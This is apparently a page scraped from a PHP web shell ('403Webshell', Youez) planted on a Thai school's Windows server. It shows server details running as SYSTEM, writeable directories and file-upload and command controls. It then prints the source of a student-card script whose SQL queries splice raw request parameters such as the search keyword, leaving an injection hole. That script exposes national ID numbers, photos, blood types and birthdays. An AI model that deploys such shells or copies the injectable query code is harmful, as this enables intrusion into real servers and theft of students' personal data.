403Webshell
Server IP : 172.67.187.206  /  Your IP : 172.71.28.156
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  E:/Inetpub/www/myschool/triamudom/check/information/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : E:/Inetpub/www/myschool/triamudom/check/information/display_student_card.php
<?php
session_start();
$path = "../";
include ($path.'include/config_db.php');
include ($path.'include/class_db.php'); 
include ($path.'include/class_display.php'); 
include ($path.'include/function.php'); 
$CLASS['db']   = new db();
$CLASS['db']->connect(); 
$CLASS['disp']   = new display();
$db   = $CLASS['db']; 
$disp   = $CLASS['disp']; 

//--------------------ส่วนบนใช้สำหรับประกาศตัวแปรและ Config เท่านั้น----------------------------//

$tb_student_degree = $_REQUEST['tb_student_degree'];

//----------------------------ค่าพื้นฐานระบบเว็บไซต์-----------------------------//
$fetch_public = $db->fetch_array($db->query("select * from tb_public"));
$link_value = $_REQUEST['link_value'];
$keyword = $_REQUEST['keyword'];
$link_value = "&tb_student_degree=".$tb_student_degree;

function FnID($var){
	$srt[0] = substr($var, 0, 1);
	$srt[1] = substr($var, 1, 4);
	$srt[2] = substr($var, 5, 5);
	$srt[3] = substr($var, 10, 2);
	$srt[4] = substr($var, 12, 1);
	return $srt[0]."-".$srt[1]."-".$srt[2]."-".$srt[3]."-".$srt[4];
}

?>
 <html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title><?php print $fetch_public['tb_public_title_admin'];?></title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style type="text/css">
<!--
body {
	margin-left: 0px;
	margin-top: 0px;
	margin-right: 0px;
	margin-bottom: 0px;
	background-color: #FFFFFF;
	color:#666666;
	font-family: Tahoma; 
}

table {
	font-family: Tahoma; 
	font-size: 12px;
	color:#666666;
}
.style1 {
	font-size: 18px;
	font-weight: bold;
}
-->
</style>
</head>

<body>
<table width="100%" border="1" align="center" cellpadding="2" cellspacing="2">
  <tr bgcolor="#CCCCCC">
    <td width="6%" height="30" align="center" valign="middle" nowrap="nowrap" class="style1"  >ลำดับที่</td>
    <td width="10%" align="center" valign="middle" nowrap="nowrap" class="style1"  >รหัสประจำตัว</td>
    <td width="12%" align="center" valign="middle" nowrap="nowrap" class="style1"  >ภาพประจำตัว</td>
    <td width="16%" align="center" valign="middle" nowrap="nowrap" class="style1"  >เลขประจำตัวประชาชน</td>
    <td width="23%" align="center" valign="middle" nowrap="nowrap" class="style1"  >ชื่อ - สกุล </td>
    <td width="7%" align="center" valign="middle" nowrap="nowrap" class="style1"  >หมู่เลือด</td>
    <td width="16%" align="center" valign="middle" nowrap="nowrap" class="style1"  >วันเดือนปี เกิด </td>
    <td width="10%" align="center" valign="middle" nowrap="nowrap" class="style1"  >รับรองข้อมูล</td>
  </tr>
  <?php
										  $page_size = 5;
										  if ($PAGE =="" || $PAGE =="0" ) { 
											 $PAGE=1; 
										  }
										$goto = ($PAGE-1)*$page_size;	
										$limit = "limit  $goto , $page_size";
										if($keyword){
											$sql_search .=" and tb_student_name like '%".$keyword."%' ";
										}
										if($keyword){
											$sql_search .=" or tb_student_sname like '%".$keyword."%' ";
										}
										if($tb_student_degree){
											
											$sql_search .=" and tb_student_degree = '".$tb_student_degree."' ";
										}
										$sql =  "select * from tb_students where 1=1 $sql_search order  by tb_student_degree asc,tb_student_tname asc,tb_student_code asc,tb_student_degree asc ".$limit;				  
										$sql_all="select * from tb_students where 1=1  $sql_search order by tb_student_degree asc,tb_student_tname asc,tb_student_code asc,tb_student_degree asc";
										$query_dis = $db->query($sql);
										$queryall = $db->query($sql_all);
										$numrows = $db->num_rows($queryall);
										if($numrows >0){
											$i=1;
											while($fetch_dis = $db->fetch_array($query_dis)){
														if($i%2=="1"){
															$bg="rowone";
														}else{
															$bg="rowtwo";
														}
																	$fetch_disstudentroom = $db->fetch_array($db->query("select * from tb_rooms where tb_room_id='".$fetch_dis['tb_student_degree']."' "));

										?>
  <tr>
    <td height="25" align="center" valign="top" nowrap="nowrap" class="style1"><?php print $i+$goto;?>.</td>
    <td align="center" valign="top" nowrap="nowrap" class="style1"><?php print $fetch_dis['tb_student_code'];?></td>
    <td align="center" valign="top" nowrap="nowrap" class="style1"><a href="../file_student/<?php print $fetch_public['tb_public_year'];?>/M<?php echo substr($fetch_disstudentroom['tb_room_name'],5);?>/<?php print $fetch_dis['tb_student_code'];?>.jpg" target="_blank"><img src="../file_student/<?php print $fetch_public['tb_public_year'];?>/M<?php echo substr($fetch_disstudentroom['tb_room_name'],5);?>/<?php print $fetch_dis['tb_student_code'];?>.jpg" width="100" border="0"></a></td>
    <td align="center" valign="top" nowrap="nowrap" class="style1"><?php print FnID($fetch_dis['tb_student_idcard']);?></td>
    <td height="25" align="left" valign="top" nowrap="nowrap" class="style1">&nbsp;<?php print display_nametype($fetch_dis['tb_student_tname']);?><?php print $fetch_dis['tb_student_name'];?> <?php print $fetch_dis['tb_student_sname'];?></td>
    <td align="center" valign="top" class="style1" nowrap="nowrap"><?php print display_blood($fetch_dis['tb_student_blood']);?></td>
    <td align="center" valign="top" class="style1" nowrap="nowrap"><?php print DateThai_show($fetch_dis['tb_student_birthday'])?></td>
    <td align="center" valign="top" class="style1"></td>
  </tr>
  <?php
											$i++;
											}
										?>
  <tr>
    <td height="25" colspan="8" bgcolor="#FFFFFF"><table width="100%" border="0" cellspacing="0" cellpadding="3">
      <tr>
        <td width="50%" class="style1"><div align="center">หน้า : <?php print $disp->ctrl_page_design_limit_show($sql_all ,10,$page_size,"red","blue","/",$link_value);?></div></td>
        </tr>
    </table></td>
  </tr>
  <?php
											}else{
										?>
  <tr>
    <td height="25" colspan="8" bgcolor="#FFFFFF"><div align="center" class="red_text"><strong>ไม่พบข้อมูล</strong></div></td>
  </tr>
  <?php 
												}
										  ?>
</table>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit